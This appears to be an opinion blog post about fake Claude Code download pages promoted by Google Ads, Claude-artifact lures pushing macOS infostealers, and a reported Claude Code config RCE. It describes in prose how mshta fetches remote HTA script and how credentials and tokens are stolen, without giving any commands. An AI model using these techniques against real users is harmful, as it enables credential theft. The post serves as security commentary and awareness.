# Fake Claude Code Malware: When Your AI Brand Becomes the Attack Surface
Every actor in this stack is pretending to be "smart" while doing the dumbest, most predictable thing imaginable, and developers are the collateral damage in a three-way grift between threat actors, ad platforms, and AI vendors who all swear this is the future of software. The fake Claude Code download campaign is the most on-the-nose example yet: compromised Google Ads accounts pushing pixel-perfect fake installers that don't install anything except an mshta-driven infostealer that lives in memory, steals your browser creds and tokens, and walks right out the front door of your cloud and Git repos.

There is a concept in offensive security called "Living off the Land" — the idea that you do not bring your own tools to the target; you use whatever is already there, already signed, already trusted. MITRE catalogs it as a technique category, but it has quietly become the default operating model of crimeware, the thing you assume rather than the thing you choose. This is that paradigm with better branding and worse incentives. As [CybersecurityNews reported](https://cybersecuritynews.com/threat-actors-using-fake-claude-code/), "cybercriminals have found a new way to target developers and IT professionals by setting up fake download pages that impersonate Claude Code." They're invoking mshta.exe — a signed Microsoft HTML Application host that's been abused for years — to pull a remote HTA, execute base64-wrapped script in memory, and never drop a clean binary for forensics to chew on. The same report explains the structural blind spot: "since it is a trusted, system-native tool, many security products do not flag its activity by default, making it a low-profile vehicle for attackers" ([CybersecurityNews](https://cybersecuritynews.com/threat-actors-using-fake-claude-code/)). Meanwhile, orgs still treat "we don't see new EXEs on disk" as a green light, and the [[20260306_svelto_bitflip_hardware_entropy_governance_sphere|Svelto bit-flip piece]] already showed us how deep the architectural assumptions go about what counts as "normal" system behavior.
The macOS side rhymes perfectly. Moonlock Lab and AdGuard walked everyone through attackers abusing Claude AI artifacts — hosted on Anthropic's own claude.ai infrastructure — plus Google Ads, to drive people into pasting a one-liner into Terminal that fetched a MacSync infostealer. "[The campaign] has already reached over 15,000 potential victims through two distinct attack variants that exploit users' trust in established online services" ([Cryptika](https://www.cryptika.com/threat-actors-exploit-claude-artifacts-and-google-ads-to-target-macos-users/)). Different OS, same pattern: leverage trusted AI branding, outsource distribution to Google's auction engine, rely on the mental shortcut that if it has the right logo and looks like a help page, it must be fine. As [News4Hackers detailed](https://www.news4hackers.com/clickfix-attack-exploits-claude-llm-artifacts-to-distribute-mac-infostealers/), "in both cases, the attackers use Google Ads to promote fake search results that lead to either a public Claude artifact or a Medium article impersonating Apple Support" — directly tying Google's ad ecosystem to the malware delivery chain.
The hypocrisy stacks up when you put the marketing copy next to the TTPs. Anthropic and everyone else pitch "safer AI," "constitutional AI," "trustworthy systems," while their ecosystem is repeatedly weaponized as a delivery mechanism for commodity stealers on both platforms — fake Claude domains, fake Claude Code installers, malicious Claude artifacts, the works. Google runs "we care about your security" campaigns while compromised advertiser accounts push malicious Claude installers to the top of search results because the bidding algorithm doesn't care what the HTA does as long as the click-through rate is spicy. This is the same structural contradiction the [[20260306_mozilla_anthropic_firefox_red_team_ai_vulnerability_discovery|Mozilla/Anthropic Firefox red team piece]] circled: security research and security theater running on the same platform, sometimes in the same sprint.
It gets worse when you stack in the supply chain. Check Point disclosed RCE-grade bugs in Claude Code itself where a repo-controlled config file could execute arbitrary commands on any developer who clones and runs it. As [TechRadar reported](https://www.techradar.com/pro/security/security-experts-flag-multiple-issues-in-claude-code-warning-as-ai-integration-deepens-se), "the ability to execute arbitrary commands through repository-controlled configuration files created severe supply chain risks, where a single malicious commit could compromise any developer working with the affected repository." That's not an edge case — one malicious commit turns your AI pair programmer into an unvetted remote shell. Stack that on top of fake installers and malicious artifacts and the "AI assistant" surface is practically indistinguishable from a moderately competent stealer campaign. The [[20260305_cursor_automations_always_on_agents_operational_risk|Cursor automations piece]] already flagged the operational risk of always-on agents with ambient filesystem access; this is that risk realized through the distribution layer.
The path dependence is obvious once you lay it out. You build an ecosystem where developer onboarding is "just Google it and click the top thing," where ad placement outranks DNS literacy, where AI tools are marketed as must-have productivity upgrades, and where security teams are understaffed and told to "use AI for triage." In that environment, of course compromised Google Ads plus a cloned landing page plus mshta is enough to walk off with GitHub tokens, cloud sessions, and SSO cookies. Once those are gone, everything else follows: private repos scraped, secrets in code harvested, infrastructure-as-code mutated, internal dashboards accessed. The "infostealer" label understates it — for a dev, this is effectively a remote control for your whole operational graph. The [[20260306_udev_netlink_hotplug_earth_system_governance_miniature|udev hotplug governance piece]] showed how a properly designed system uses credential filtering at the socket layer; the developer ecosystem has nothing analogous for its own supply chain.
> **Read the full thread at ...**
> X → https://x.com/JoeMaristela
> Mastodon → https://mastodon.social/@JoeMaristela/
> AI workflow help → https://www.fiverr.com/s/AyarlrP
We end up in this absurd equilibrium where devs are told "you must use AI tools to keep up," the distribution of those tools is mediated by an ad ecosystem that can be quietly hijacked, the tools themselves occasionally ship RCE-class flaws, and the same brand can appear as secure copilot, attack surface, and lure in three different reports in the same month. Everyone involved — ad platforms, AI vendors, security tool makers — gets to shrug and talk about "the evolving threat landscape" instead of admitting that this is exactly what you get when you wire critical workflows to systems whose primary optimization target is engagement, not integrity. The [[20260306_menlo_mit_37b_boom_95pct_failure_arms_race_bubble|Menlo/MIT capex piece]] applies here: the more capital you pour into making these tools ubiquitous, the more valuable every exploit path into the ecosystem becomes. The interesting question isn't "how do we tell devs to click the right link" — it's what an AI-centric development environment looks like if you design it assuming the ad layer, the artifact layer, and the OS layer are all actively hostile some of the time.
*Your AI brand is simultaneously your growth engine, your attack surface, and someone else's lure. That is not a bug in the ecosystem — it is the ecosystem working exactly as designed, just not for you. The interesting question is not how to warn developers to click the right link; it is what happens when the entire development environment is wired to distribution channels that are adversarial some of the time, and nobody can tell you which fraction of the time that is.*